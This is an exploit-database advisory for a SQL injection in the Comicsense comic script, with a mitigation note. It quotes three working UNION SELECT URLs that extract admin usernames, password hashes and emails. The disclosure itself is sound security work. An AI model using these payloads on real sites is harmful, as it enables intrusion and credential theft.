Comicsense SQL Injection Advisory/Exploit

vendor:

Comicsense

by:

s0cratex

5.5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: Comicsense

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Comicsense SQL Injection Advisory/Exploit

The bug is a common SQL injection in the 'index.php' file of the Comicsense script. The variable '$epi' is not verified, allowing an attacker to inject malicious SQL queries and retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and parameterized queries to prevent SQL injection attacks. Additionally, keeping the software up to date with the latest patches and security updates is crucial.

Source

Exploit-DB raw data:

*********************************************
  Comicsense SQL Injection Advisory/Exploit
*********************************************

by s0cratex
s0cratex@hotmail.com
http://plexinium.net

-
ComicSense is a script using php / mySQL.
It allows you to easily host an Online Comic
or Image shack.
You can download it from www.gayadesign.nl/comicsense/
-

The bug is a common sql injection in "index.php"

Line 32:
$sqlQuery = "SELECT * FROM " . $prefix . "comic WHERE episodenr = $epi";
And the variable $epi is not verified...

Exploit:
--------
Admin username
http://site.com/comic_paht/index.php?epi=-1 UNION SELECT username,1,1 FROM users

MD5 hash password:
http://site.com/comic_paht/index.php?epi=-1 UNION SELECT password,1,1 FROM users

e-Mail adress:
http://site.com/comic_paht/index.php?epi=-1 UNION SELECT email,1,1 from users

# milw0rm.com [2007-06-05]